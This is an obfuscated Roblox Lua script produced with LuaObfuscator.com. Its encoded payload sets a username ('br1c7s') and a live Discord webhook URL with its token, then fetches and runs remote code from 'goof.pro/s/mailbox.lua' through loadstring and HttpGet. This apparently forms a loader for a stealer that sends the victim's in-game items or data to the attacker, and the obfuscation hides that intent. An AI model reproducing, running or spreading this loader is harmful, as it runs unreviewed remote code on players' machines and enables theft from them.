--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v99=v5(v69,v19);v19=nil;return v99;else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=(0 -0) -0 ;local v71;while true do if (v70==((1065 -(68 + 997)) -0)) then v71=(v31/((3 -1)^(v32-((1272 -(226 + 1044)) -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v71-(v71%1) ;end end else local v72=927 -((931 -717) + 713) ;local v73;while true do if (v72==(0 + 0)) then v73=((118 -(32 + 85)) + 1 + 0)^(v32-(878 -(282 + 595))) ;return (((v31%(v73 + v73))>=v73) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1 + (180 -(67 + 113)))) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=351 -(87 + 263) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(584 + 218 + (1147 -(915 + 82)))) ;return (v41 * 16777216) + (v40 * ((499614 -323170) -110908)) + (v39 * ((271 + 193) -208)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1188 -(1069 + 118) ,45 -25 ) * (((3 + 0) -(773 -(201 + 571)))^(6 + 26))) + v42 ;local v46=v20(v43,37 -16 ,31 + 0 );local v47=((v20(v43,823 -(368 + 423) )==(3 -2)) and  -(19 -(10 + 8))) or (3 -2) ;if (v46==(442 -(416 + 26))) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=1138 -(116 + 1022) ;end elseif (v46==(2485 -(145 + 293))) then return ((v45==0) and (v47 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(((4 -3) + 1)^52))) ;end local function v25(v48)local v49;if  not v48 then local v74=0 -0 ;while true do if (v74==(859 -(814 + 45))) then v48=v23();if (v48==(0 + 0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v66=886 -(261 + 624) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=850 -(20 + 830) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(1926 -(1235 + 691))) then else v52=126 -(116 + 10) ;v53=nil;v51=1;end if (v51~=3) then else v58=nil;while true do local v80=0;local v81;while true do if (v80==(1835 -(274 + 1561))) then v81=738 -(542 + 196) ;while true do if (v81==(2 -1)) then if (v52~=(2 + 0)) then else local v107=241 -(187 + 54) ;local v108;while true do if (v107==(780 -(162 + 618))) then v108=0 + 0 ;while true do local v113=0 + 0 ;while true do if (v113~=(0 + 0)) then else if ((0 + 0)~=v108) then else local v164=0 -0 ;while true do if (v164~=(0 -0)) then else for v171=1 -0 ,v23() do local v172=0;local v173;while true do if ((0 -0)==v172) then v173=v21();if (v20(v173,1 + 0 ,1637 -(1373 + 263) )==(405 -(118 + 287))) then local v177=1000 -(451 + 549) ;local v178;local v179;local v180;local v181;local v182;while true do if (v177==(0 + 0)) then v178=0 -0 ;v179=nil;v177=1;end if (v177==(2 -0)) then v182=nil;while true do if ((2 -0)~=v178) then else while true do if ((1387 -(746 + 638))==v179) then if (v20(v181,2 + 1 ,1 + 2 )==(978 -(553 + 424))) then v182[5 -1 ]=v58[v182[4 + 0 ]];end v53[v171]=v182;break;end if (v179~=(1 + 0)) then else local v192=0;local v193;while true do if (v192~=(341 -(218 + 123))) then else v193=0 + 0 ;while true do if (v193==(1581 -(1535 + 46))) then local v202=0;while true do if (v202~=(0 + 0)) then else v182={v22(),v22(),nil,nil};if (v180==(0 + 0)) then local v203=0 -0 ;local v204;while true do if (v203==(560 -(306 + 254))) then v204=0 + 0 ;while true do if (v204==(0 -0)) then v182[756 -(239 + 514) ]=v22();v182[2 + 2 ]=v22();break;end end break;end end elseif (v180==(1468 -(899 + 568))) then v182[3]=v23();elseif (v180==2) then v182[2 + 1 ]=v23() -((4 -2)^(619 -(268 + 335))) ;elseif (v180~=(293 -(60 + 230))) then else local v209=572 -(426 + 146) ;local v210;while true do if (v209==(0 + 0)) then v210=731 -(476 + 255) ;while true do if (v210~=(1130 -(369 + 761))) then else v182[2 + 1 ]=v23() -((1458 -(282 + 1174))^16) ;v182[815 -(569 + 242) ]=v22();break;end end break;end end end v202=2 -1 ;end if (v202==(1 + 0)) then v193=1025 -(706 + 318) ;break;end end end if (v193==1) then v179=2;break;end end break;end end end if (v179~=(3 -1)) then else local v194=1251 -(721 + 530) ;while true do if (v194~=(1272 -(945 + 326))) then else v179=3 -0 ;break;end if (v194==(0 -0)) then if (v20(v181,1 + 0 ,701 -(271 + 429) )~=(217 -(42 + 174))) then else v182[2 + 0 ]=v58[v182[2]];end if (v20(v181,1502 -(1408 + 92) ,2)==1) then v182[2 + 1 ]=v58[v182[3]];end v194=1087 -(461 + 625) ;end end end if (v179~=(1580 -(1183 + 397))) then else v180=v20(v173,2,1291 -(993 + 295) );v181=v20(v173,4,1 + 5 );v179=1;end end break;end if (v178==(1171 -(418 + 753))) then v179=0;v180=nil;v178=2 -1 ;end if (v178==(1 + 0)) then local v190=0 + 0 ;while true do if (v190==(0 + 0)) then v181=nil;v182=nil;v190=1 + 0 ;end if (v190~=(1 + 0)) then else v178=1977 -(1913 + 62) ;break;end end end end break;end if (v177~=(530 -(406 + 123))) then else v180=nil;v181=nil;v177=1771 -(1749 + 20) ;end end end break;end end end for v174=1,v23() do v54[v174-(1 + 0) ]=v28();end v164=3 -2 ;end if (v164==1) then v108=1323 -(1249 + 73) ;break;end end end if (v108~=(1662 -(1477 + 184))) then else return v56;end break;end end end break;end end end break;end if (0==v81) then local v106=0 + 0 ;while true do if (v106==(1 + 0)) then v81=857 -(564 + 292) ;break;end if (v106==(1145 -(466 + 679))) then if (v52~=(2 -1)) then else local v109=0 -0 ;local v110;while true do if (v109==(1900 -(106 + 1794))) then v110=0;while true do if (v110~=(306 -(244 + 60))) then else v52=2 + 0 ;break;end if ((477 -(41 + 435))~=v110) then else local v165=1001 -(938 + 63) ;local v166;while true do if (v165==0) then v166=0 + 0 ;while true do if (v166==(1 + 0)) then v110=2 + 0 ;break;end if (v166==(0 -0)) then local v176=0 -0 ;while true do if (1~=v176) then else v166=115 -(4 + 110) ;break;end if (v176==0) then for v184=1,v57 do local v185=0;local v186;local v187;local v188;local v189;while true do if (v185~=(585 -(57 + 527))) then else v188=nil;v189=nil;v185=1429 -(41 + 1386) ;end if (v185==(103 -(17 + 86))) then v186=1613 -(1565 + 48) ;v187=nil;v185=1 + 0 ;end if (v185==2) then while true do if (v186==(1 -0)) then v189=nil;while true do if (v187==0) then v188=v21();v189=nil;v187=1139 -(782 + 356) ;end if (v187==1) then if (v188==(268 -(176 + 91))) then v189=v21()~=(0 -0) ;elseif (v188==(5 -3)) then v189=v24();elseif (v188==(1095 -(975 + 117))) then v189=v25();end v58[v184]=v189;break;end end break;end if (v186~=(166 -(122 + 44))) then else v187=0 -0 ;v188=nil;v186=1;end end break;end end end v56[3]=v21();v176=3 -2 ;end end end end break;end end end if (v110==(0 + 0)) then local v167=0 -0 ;while true do if (v167~=(0 -0)) then else local v170=0;while true do if (v170~=1) then else v167=1 + 0 ;break;end if (v170==0) then v57=v23();v58={};v170=1019 -(697 + 321) ;end end end if (v167==(1 + 0)) then v110=1;break;end end end end break;end end end if (v52==(0 -0)) then local v111=0 -0 ;local v112;while true do if (v111==(0 + 0)) then v112=0 -0 ;while true do if ((66 -(30 + 35))==v112) then local v168=0 -0 ;while true do if (v168~=0) then else v55={};v56={v53,v54,nil,v55};v168=1228 -(322 + 905) ;end if (1==v168) then v112=7 -5 ;break;end end end if (v112==0) then local v169=0;while true do if (v169==1) then v112=1213 -(323 + 889) ;break;end if (v169==(0 -0)) then v53={};v54={};v169=581 -(361 + 219) ;end end end if (v112==2) then v52=1190 -(449 + 740) ;break;end end break;end end end v106=321 -(53 + 267) ;end end end end break;end end end break;end if (v51==(949 -(245 + 702))) then local v75=0 + 0 ;while true do if (v75==(413 -(15 + 398))) then v56=nil;v57=nil;v75=983 -(18 + 964) ;end if (v75==1) then v51=1901 -(260 + 1638) ;break;end end end if (v51==(441 -(382 + 58))) then local v76=0;while true do if (v76~=0) then else local v98=0 -0 ;while true do if (v98==(1 + 0)) then v76=3 -2 ;break;end if (v98==0) then v54=nil;v55=nil;v98=1;end end end if (v76~=(1 + 0)) then else v51=2;break;end end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v82=v63;local v83=v64;local v84=v65;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=8) then if (v95<=3) then if (v95<=1) then if (v95>0) then local v114=v94[2];local v115,v116=v85(v92[v114](v13(v92,v114 + 1 ,v94[3])));v87=(v116 + v114) -1 ;local v117=0;for v141=v114,v87 do v117=v117 + 1 ;v92[v141]=v115[v117];end else do return;end end elseif (v95>2) then v61[v94[3]]=v92[v94[2]];else local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==1) then v87=(v123 + v121) -1 ;v124=0;v120=2;end if (2==v120) then for v161=v121,v87 do v124=v124 + 1 ;v92[v161]=v122[v124];end break;end if (v120==0) then v121=v94[2];v122,v123=v85(v92[v121](v13(v92,v121 + 1 ,v94[3])));v120=1;end end end elseif (v95<=5) then if (v95==4) then v92[v94[2]]();else do return;end end elseif (v95<=6) then local v125=0;local v126;local v127;while true do if (v125==0) then v126=v94[2];v127=v92[v94[3]];v125=1;end if (v125==1) then v92[v126 + 1 ]=v127;v92[v126]=v127[v94[4]];break;end end elseif (v95==7) then v92[v94[2]]();else v92[v94[2]]=v61[v94[3]];end elseif (v95<=12) then if (v95<=10) then if (v95==9) then v92[v94[2]]=v94[3]~=0 ;else local v129=0;local v130;local v131;while true do if (v129==0) then v130=v94[2];v131=v92[v94[3]];v129=1;end if (v129==1) then v92[v130 + 1 ]=v131;v92[v130]=v131[v94[4]];break;end end end elseif (v95==11) then v92[v94[2]]=v94[3]~=0 ;else local v133=v94[2];v92[v133]=v92[v133](v13(v92,v133 + 1 ,v87));end elseif (v95<=14) then if (v95==13) then v92[v94[2]]=v61[v94[3]];else v92[v94[2]]=v94[3];end elseif (v95<=15) then local v139=v94[2];v92[v139]=v92[v139](v13(v92,v139 + 1 ,v87));elseif (v95==16) then v92[v94[2]]=v94[3];else v61[v94[3]]=v92[v94[2]];end v86=v86 + 1 ;break;end if (0==v97) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D6503063O0062723163377303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O323733393638393835343630372O34312F6C2O476552336A7839594D4B65524E5A634F5A6E695344365F6165537369394D44454F55736F73654D582O4F5A744454565A7A546B552D4B63426F68385F6377534E4265030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C7561000D3O0012103O00023O0012113O00013O0012103O00043O0012113O00033O0012083O00053O001208000100063O002006000100010007001210000300084O0009000400014O0001000100044O000C5O00022O00073O000100016O00017O00",v9(),...);end
